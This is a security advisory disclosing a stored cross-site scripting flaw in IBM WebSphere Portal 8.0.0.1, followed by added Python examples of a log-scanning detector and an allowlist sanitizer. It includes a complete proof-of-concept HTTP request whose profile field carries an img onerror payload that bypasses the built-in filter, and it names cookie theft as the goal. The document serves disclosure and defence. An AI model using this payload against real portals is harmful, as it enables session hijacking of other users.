SSD Advisory – IBM WebSphere Portal Cross-Site Scripting (XSS)

Vulnerabilities Summary
The following advisory describes a Cross-Site Scripting (XSS) vulnerability found in WebSphere Portal version 8.0.0.1.
IBM WebSphere Portal products provide enterprise web portals that help companies deliver a highly-personalized, social experience for their customers. WebSphere Portal products give users a single point of access to the applications, services, information and social connections they need. These products help increase visitor response and reduce web operations cost while offering a range of capabilities to meet your business needs.
Credit
An independent security researcher has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program.
Vendor response
We notified IBM of the vulnerability in September 2016; repeated attempts to re-establish contact and obtain the status of a patch for this vulnerability went unanswered. At the time of publication there is no solution or workaround for this vulnerability.

Vulnerabilities Details
IBM WebSphere Portal version 8.0.0.1 suffers from an input validation issue that allows the built-in anti Cross-Site Scripting (XSS) mechanism to be bypassed. That mechanism is meant to filter potentially malicious HTML tags when a user updates their profile details. The identified vulnerability allows malicious users to perform stored XSS attacks in order to steal the session cookie or perform CSRF attacks.
Proof of Concept
The following HTTP request can be used to bypass the anti-XSS filter and store arbitrary JavaScript code as part of the user profile information:

POST /profiles/ajax/editMyProfile.do?lang=en_us HTTP/1.1
Host: 192.168.1.200
User-Agent: Mozilla/5.0 (xxxx)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://192.168.1.200/profiles/html/editMyProfileView.do?tab=aboutMe&lang=en_us
Content-Length: 258
Cookie: *cookies here*
Connection: keep-alive
Cache-Control: no-cache
dangerousurlnonce=cdcdccd-3333-2222-1111-000000000000&subEditForm=aboutMe&attribute(description)=%3Cp%20dir%3D%22ltr%22%3E%0A%09%3Cstrong%3EAAAAA%3C%2Fstrong%3E%3C%2Fp%3E%0A&attribute(experience)=<img%20src=x%20xxxx%20onerror="alert(document.cookie)"%2f%2f%
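
From a detection standpoint, the request above is what a reverse proxy or WAF with request-body logging would record, and the stored field can be found by URL-decoding the form body and scanning the attribute(...) values for markup that a profile field should never carry. The following is an added example, not part of the advisory; the sample request list, its (path, body) logging format and the detection pattern are constructed assumptions, with the first body taken from the request above and the second a benign edit:

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample of logged profile-update requests as (request path, raw form body).
# Entry 0 is the body from the advisory; entry 1 is a benign profile edit for contrast.
SAMPLE_REQUESTS = [
    ("/profiles/ajax/editMyProfile.do?lang=en_us",
     "dangerousurlnonce=cdcdccd-3333-2222-1111-000000000000&subEditForm=aboutMe"
     "&attribute(description)=%3Cp%20dir%3D%22ltr%22%3E%0A%09%3Cstrong%3EAAAAA%3C%2Fstrong%3E%3C%2Fp%3E%0A"
     "&attribute(experience)=<img%20src=x%20xxxx%20onerror=\"alert(document.cookie)\"%2f%2f%"),
    ("/profiles/ajax/editMyProfile.do?lang=en_us",
     "dangerousurlnonce=cdcdccd-3333-2222-1111-000000000000&subEditForm=aboutMe"
     "&attribute(description)=%3Cp%3EHello%3C%2Fp%3E&attribute(experience)=10%20years%20of%20Java"),
]

# Endpoint from the advisory; only bodies posted here are inspected.
PROFILE_UPDATE_PATH = "/profiles/ajax/editMyProfile.do"

# Markup with no business in a profile field: an on* event-handler attribute inside a
# tag, a <script> tag, or a javascript: URL. Assumed detection pattern for this example.
SUSPICIOUS = re.compile(r"<\s*[a-z][^>]*\son[a-z]+\s*=|<\s*script\b|javascript\s*:", re.I)


def decode_form_fields(body: str) -> dict:
    """URL-decode an application/x-www-form-urlencoded body into {field: first value}.
    parse_qs splits each pair on the first '=' only, so '=' inside a value survives,
    and a dangling '%' (as in the advisory's payload) is kept literally."""
    return {name: values[0] for name, values in parse_qs(body, keep_blank_values=True).items()}


def find_suspicious_profile_updates(requests):
    """Return one finding per attribute(...) field whose decoded value matches SUSPICIOUS."""
    findings = []
    for path, body in requests:
        if urlsplit(path).path != PROFILE_UPDATE_PATH:
            continue
        for field, value in decode_form_fields(body).items():
            match = SUSPICIOUS.search(value) if field.startswith("attribute(") else None
            if match:
                findings.append({"path": path, "field": field, "match": match.group(0)})
    return findings


if __name__ == "__main__":
    for finding in find_suspicious_profile_updates(SAMPLE_REQUESTS):
        print(f"{finding['path']} field {finding['field']}: {finding['match']!r}")
```

The scan keys on decoded values rather than the raw body so that percent-encoded variants of the same markup are caught; the benign description field, which legitimately carries <p> and <strong>, does not trigger because the pattern requires an event-handler attribute, a script tag or a javascript: URL rather than any tag at all.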

Once the attacker has stored the payload as part of their profile, the embedded JavaScript code is executed when the following URL is browsed:

https://192.168.1.200/profiles/html/profileView.do?userid=*attacker_user_id*&lang=en_us

It should be noted that the aforementioned HTTP request results in the storage of the following HTML tag, which allows the execution of the alert() JavaScript method:

<img src=x xxxx onerror="alert(document.cookie)"//%
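
The root cause described above is a blocklist filter that tries to strip known-bad tags from the stored value. The following is an added example, not code from the advisory or from WebSphere Portal, showing the two defences that close this class of bug: entity-encoding a field that is rendered as plain text, and passing a rich-text field through an allowlist sanitizer that keeps only known-harmless tags and attributes and drops everything else, event-handler attributes included. The allowlist (p, strong, em, br and the dir attribute on p) is an assumed policy for this example; the two inputs are the URL-decoded description and experience values from the request above:

```python
import html
import re
from html.parser import HTMLParser

# Assumed allowlist for the rich-text "description" field: anything not listed here,
# including <img> and every on* event-handler attribute, is dropped rather than "filtered".
ALLOWED_TAGS = {"p", "strong", "em", "br"}
ALLOWED_ATTRS = {"p": {"dir"}}


def render_text_field(value: str) -> str:
    """Output encoding for a field displayed as plain text (e.g. 'experience'):
    <, >, &, " and ' become entities, so stored markup is shown, not parsed."""
    return html.escape(value, quote=True)


class AllowlistSanitizer(HTMLParser):
    """Rebuilds markup keeping only allowlisted tags/attributes; all text is re-encoded."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []        # output fragments
        self.open_tags = []  # stack of allowlisted tags still open

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            return  # unknown tag: dropped entirely, attributes included
        kept = [
            f' {name}="{html.escape(value, quote=True)}"'
            for name, value in attrs
            if name in ALLOWED_ATTRS.get(tag, set()) and value is not None
        ]
        self.out.append(f"<{tag}{''.join(kept)}>")
        if tag != "br":
            self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if tag in self.open_tags:
            # also close anything opened after `tag`, keeping the output well-formed
            while self.open_tags:
                closed = self.open_tags.pop()
                self.out.append(f"</{closed}>")
                if closed == tag:
                    break

    def handle_data(self, data):
        # text (including any unparseable '<' the parser hands back as data) is re-encoded
        self.out.append(html.escape(data, quote=False))

    # comments, doctypes and processing instructions: HTMLParser's defaults discard them

    def close(self):
        super().close()
        self.out.extend(f"</{tag}>" for tag in reversed(self.open_tags))
        self.open_tags.clear()


def sanitize_rich_text(value: str) -> str:
    parser = AllowlistSanitizer()
    parser.feed(value)
    parser.close()
    return "".join(parser.out)


_TAG_RE = re.compile(r"<\s*/?\s*([A-Za-z][A-Za-z0-9]*)")


def only_allowlisted_tags(markup: str) -> bool:
    """Check for rendered output: every raw '<' must open or close an allowlisted tag."""
    for i, ch in enumerate(markup):
        if ch == "<":
            m = _TAG_RE.match(markup, i)
            if m is None or m.group(1).lower() not in ALLOWED_TAGS:
                return False
    return True


# Stored values from the advisory's request, URL-decoded
DESCRIPTION = '<p dir="ltr">\n\t<strong>AAAAA</strong></p>\n'
EXPERIENCE = '<img src=x xxxx onerror="alert(document.cookie)"//%'

if __name__ == "__main__":
    print(sanitize_rich_text(DESCRIPTION))  # formatting preserved
    print(sanitize_rich_text(EXPERIENCE))   # <img ...> gone, nothing executable left
    print(render_text_field(EXPERIENCE))    # shown literally as text
```

The point of the allowlist is that the stored value from the advisory never has to be recognised as dangerous: <img> is simply not a permitted tag, so the whole element and its onerror attribute disappear, while the legitimate <p dir="ltr"><strong> markup in the description field passes through unchanged. The only_allowlisted_tags check is the property a unit test for the rendering layer should assert, independent of how a given HTML parser treats the unterminated tag at end of input.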